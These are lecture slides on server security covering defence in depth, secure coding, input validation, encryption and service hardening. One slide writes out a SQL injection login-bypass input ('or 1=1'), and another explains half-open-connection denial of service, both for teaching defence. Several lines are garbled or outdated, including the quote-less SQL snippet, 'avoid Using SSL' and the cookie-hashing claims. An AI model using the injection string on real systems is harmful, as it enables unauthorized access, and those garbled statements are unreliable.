Chapter 10 (Week 11)

Server Security

Dr Rudi Rusdiah
T1005
13 May 2017 (Week 12)
 Server Security 1/3
3 Network Security Category: User Workstation; The Network Devices & Server.
Reason Server as Target of Attack: (1). They hold large volumes of critical data; (2).
Connected to many workstations;
Maintain Security Mind Set before developing Secure products or environment.
Security improvement will come at a cost of time, money & convenience.
Approaches to improve the security during s/w Design & dev:
1.Risk Based Security Controls: How to address security often confronted with the
following:
a.Technology is very high tech & not fully understood by management.
b.The threat is usually abstract cant translate into dollars
c.Greatest threat from insider. Corporate culture& trust important.
d.Item at risk are intangible : Information; Reputation; & uptime
e.Often false alarm wrong prediction.
f.Many solution provider of services, often only partial solution
g.Spending amount is not correlate with Security obtained.. Ie $30 modem can bypass
security of $200,000 firewall installation.
Management perspective: Security Insurance. So the risk to a Server should be
based on the likelihood of an attack occurs & the business impact.
Continue. (2)
 Server Security 2/3
2. Defence in Depth (DiD) Principle Series of protection measures taken as a whole
not partial. Ie: include building firewall, DMZ zone, proxy, clouds, Anti virus, EWS (Early
Warning Systems) Deterrent etc.
DiD to s/w dev & server apps features:
1.All security resources concentrate on single protection: ie: $200,000 Firewall to
protect from Internet but it can be breach by $30 modem because there is internal PC
has direct connections & no awareness training.
2. A protective measure: security control use of strong password for all internal
user that are trusted.
3. Keep It Simple &Secure : Complexity & Confusion aid attacker exploit the system;
Apps should be transparent so security flaws easily detections. Closed systems can
hide bad security design.
Fully documented.ie: if a system used 128 bit encryption).
If complex Server apps may have different Component. Ie: One component for
password authentication; Second component for Access to Database data. The logical
interfaces between these components Trust Boundaries.
4. Respect the Adversary (Enemy): Attacker dont play by the rule, designer should
plan the unexpected. H/W & S/W might fail murphy law but it should fail in a safe
& predicted manner. Attacker will make the system crash & overload ,& circumvent
security control, then exploit & compromised the systems
Fail Safe design better chance to withstand an attack.
 Server Security 3/3
5. Security Awareness: Security Mindset educating dev & network engineering on
security risk involved:
a. Security Policy & role responsibility when developing apps.
b. Products Specs Req.: Financial institution Gramm Leach Bliley Act req on Credit
Card Co & Visa holder.
Protect privacy & private data by the following: (1). Install network firewall to protect
from Internet; (2) Keep Security Patches up to date; (3) Encrypt Store Data; (4) Encrpt
data send across networks; (5) Use Anti virus updated.; (6) Restrict access to data by
business on need to know basis; (7) Assigned a unique ID to access data; (8) dont use
vendor default to security parameter & passwords; (9) Regularly test the systems &
process. (10). Restrict physical access to card holder info.
c. Security Basics; password; physical security; policies
d. Security Awareness Testing.

6. Business Impact: Justification should be to minimize security risk & business impact
of any Attack.
(a.) ie: significant credit card info lost.. Business impact will hundred of man hours; (b)
cause extensive internal investigation man hours, legal cost & investigation; Damage
to customer relations loss of future business; (d) damage to organization public image;
 Establish Secure Dev. Environment
The Development environment should address business risk
& impact that cover the following areas: (1) Management; (2)
Security Awareness; (3) Software Development; (4)
Configuration Control; (5) Network Security.
1.Management: Mngmt support important & value time &
effort in making secure product. Developing secure product is
costly in the short run. Developing security product is cheaper
if design & expertise involved from the beginning. Must have
security officer in charge.
2.Configuration Control Board (CCB) responsible for: (1)
Establishment of formal change management. Attack usually
occurs during change; (2) Establishment of formal
requirement & testing program;
3.Network Support & Development
 Secure Development Practises
Many methods for developing code for Secure Apps.
Security requirement are laid down early in development process.
Tools & Techniques used to design & develop clean, efficient apps with support the
development of secure code :
(1) Handling of sensitive data & need special handling technique. Especially more &
more personal & sensitive info put on Server. Password should be encrypted by one
way hashes, so cannot be extracted from the Server. The only way to break would be
through brute force cracking. Password, credit card info, financial info. never send in
clear and also should not be viewed on screen.
(2) Keeping the Server Code Clean & not expose to much info to a would be attackers.
Hacker examine HTML & scripts for info to attack. Comments should be stripped from
operational code. Third party WebServer & FTP Server s/w often provide banner
indicate version of the software, which can be used to narrow down the target of
attack.
(3) Choosing a coding language. Dont use directly C & C++ that unable to detect &
prevent memory allocation which caused buffer overflow. Java has built in security
(4) Avoiding Content Injection- Data (content entered by a user should never be put
directly into a command or query.
See next slide.
 Input Validation & Content Injection
All input from untrusted user/entity must be verified & validated. In client-server
environment is difficult to validate client Client should be treated untrusted.
Content injection occurs when Server takes input from the user & apply the input
content into commands or SQL Statement.
Or the user input gets injected into the command that can be executed by Server.
Content injection can be dangerous if the servers doesnot have a clear distinction &
separation between data input & the command executed.
Fundamental paradigm different between Developer & Attacker when designing Web
base Apps. Developer assumes user goal & application are same, this tends to assume
user always provide correct input. If error developer assumed honest mistakes.
Unfortunately Attacker looks to use input as a key method to DISRUPT Apps. The
attacker know little to be gain by proceeding through the apps as developers expect.
Thus developer should test all possibility input carefully & thoroughly ..
Be Careful in using special Character for input. Unix Shell can interpret differently
this special character such as . (dot) or back tick ().
Cross Site Scripting (CSS): Capability of a script to call up a completely different
Website & in the process capture the cookies & info exchange between user & that
site. CSS usually embedded in Email or Webpage.
Cookies remember user between visit or prevent user having to log in repeatedly
the same Web Apps.
 SQL Injection (SQL I)
SQL: Manipulating database using SQL command to Web apps & execute
against the Database.
Consider the following script from a Server Apps:
sql = select username from users
Where userid = & request (userid) &
And password = & request (password) &

If user enter user-name:

any_bogus_name or 1=1 and password =
The result SQL entry will be
Select user name from user where userid =any_bogus_name or 1=1
and password =
 Stored Procedure
Hacker similar to Internal or External user gain access to the database &
can learned where key data are stored.
Apps Server should not use any direct Structured Query Language (SQL).
Instead, modification, additions, or deletions of data base information
always use a stored procedure to perform the function.

Now SQL Statement will not have any right to access data in the tables;
instead only Stored Procedure will be able to access.
Hacker could do a SELECT & pull back all of a tables data, if SQL is
allowed & and no Stored Procedure.

However, if stored procedure is used, it allow data to be retrieved only

in the built in amount, format & rules, the system would limit the
amount of data a hacker could retrieve.
 Dynamic Scripting & DOS attack
Dynamically executing script, user inputs is risky.
The attacker could input a abnormal input. Dynamic Scripting should be
disabled at the database level or Java environment level.
Limit all unusual input prevent DDOS attack

For instance a POST command sent without any data may not return in
the server. It may used up Server resources ie: TCP connections remain
open.
If the attack initiate hundreds of connections that dont fully completed
& the Server must keep half open connections in memory because the
algorithms expect connections to be completed or reset.
When the memory for the new connections fills up, no more user can
connect to the Server & crash.
This is DOS (Denial of Service ) Attack
 Use Encryption 1/2
Encryption maintain Confidentiality of Data.
Price of encryption is performance, cost of additional HW to increase bandwidth &
performance or SW.
Encryption used in Transmission, Storage or Data verification (covered in in Ch 14 &
16).

In data storage adds another Defence in Depth (DiD) model, if there is breach in
physical security or server host is compromised.
Encryption in transmission for any sensitive or private data: name, address, phone;
Credit card number, PIN (Personal ID Number); Financial data; Salary Info; Shopping
cart etc.

Ie: SSL (Secure Socket Layer) & VPN (Virtual Private Network).
- SSL encrypt apps traffic. SSL compatible client, such as Web browser.
- VPN: all network traffic is encrypted & tunneled. Because both end of VPN must
be compatible & coordinated, it is not solution for general public, but for small set of
user
 Use Encryption 2/2
Encryption pass cookie from Web Server to Web Browser in clear text. If encrypted by
server, only server has key to decrypt cookies when returned from browser. Cookies
integrity is maintained & hash field info. Hash algorithm decrypt original cookies & pass
thru a one way encryption process produce short string. Encryption & hashing ensure
privacy & integrity of info with little overhead & add Defence in Depth(DiD).
Web apps often hijack & replay by MitM, avoid Using SSL.

SSL protocol above TCP/IP layer & below Apps layers: HTTP or IMAP. SSL use TCP/IP on
behalf of apps protocol. The process allow SSL enable Server to authenticate allow both
server & client established encrypted connection.
Negative of SSL: Reduce performance of HTTP server involved CPU, Memory & network.
CPU has to process HTTP request, write out HTTP headers, log request & put in TCP Stack:
Bandwidth: SSL adds average only 1K bytes to each transaction.
Latency: SSL with client authentication requires two round trips between server & client
before HTTP session begin, so at least 500ms addition to HTTP Service Time.
Bulk encryption: SSL use RC4 & MD5 in its cypher suite run efficient on 32 bit CPU.
Key exchange: CPU bottleneck on SSL Server, when SSL optimized to run RSA sessions/key.
Netscape data: Performance SSL enable Server is lower 20% than unencrypted Server.
Max performance hit occurs when Server & Client exchange handshake message for
authentication & key generation of exchange.
This require intensive computation Public Key operation.
 Operating Server Safely 1/2
1. Control Server Configuration:
(a) Physical Security especially Public clouds or Data Center or even on Premise is
vulnerable to attacker with physical access. CIA (Confidentiality, Integrity & Availability
(UPS, insurance, cooling). Restrict physical access to Server especially unauthorized
persons. Physical protections should extend to cabling, network, router that are critical
to server operation.
(b)Minimizing & Separation of Services because attacker will look to break thru
Services running in the System. If separate the attack can be localized.
c. Disable default services/apps Server OS enabled:
(1) Telnet can transmit data in clear text, should use SSH (Secure Shell ) instead; (2)
SMTP (Simple Main Transfer Protocol) Mail Server are often target to attack & vehicle
to communicate to outside world illegally if compromised; (3) FTP has a number of
vulnerability & must beconfigured; (4) Finger can be used to get info & launched an
attack.; (5) Netstat, Systat can dislose configuration & usage info. (6) Chargen, Echo
These service can be used to launch data driven or DOS attack; (7) DNS should be
patched regularly; (8). RPC (Remote Procedure Call should be removed,
Ensure these extraneous services are disabled or even deleted from the system
(d) System Backup to mitigate risk: Frequency of back up is important. If loss of day
worth of data cant be tolerate.. Use Zero down time failover system. Backup can aid in
post attack reconstructions..
 Operating Server Safely 2/2
2. Controlling User & Access: O/S & host run Server S/W are general computer devices
involve multiple users & multiple apps. So sysadmin must establish a need to know
environment. Data access limited to need to know user.
User Activity group into session. Cookies used to identify users & maintain
session objects keep track user specific info ie navigation info & period. If too long
should be time out & reset & log out & need to re-authenticate to continue use
services. There is session tracking from one session to other.
Authorized Transaction by entering user name & password.
Password: Strong Password required & should be stored encrypted.
3. Monitoring, Auditing & Logging :
Log: Recording key info about server & services ie event log by O/S or Apps. Log useful
info in reconstructing an attack or incident.
Monitoring: Periodic review of log & other server info. Done continuously by Help
Desk. Regular monitor identify incident policy & procedural violation.
Auditing: Process of verifying log and if monitoring are done according to plan &
procedure.
Monitoring & Logging is passive yet effective form of intrusion detections.
 Server Apps: WebServer(ch6)&Email (ch8)
Three more category Server:
Data Sharing Server consist of FTP Servers, Lightweight Directory Access
Protocol (LDAP) or NetBios Server.
Peer to Peer information exchange via Server.
IM (Instant Messaging) & IRC (Internet Relay Chat).

FTP Servers:
Exchange files public or unknown users (anonymous FTP). When prompted
user name, anonymous is used. Some Anonym FTP allow writable area or
drop off directory for files. If it can be read by anonym FTP user, can be
potential abuse. This drop off sites Data repositories for abuser share info.
If not locked, FTP Server can be a point of compromised for the Server &
Network as a whole.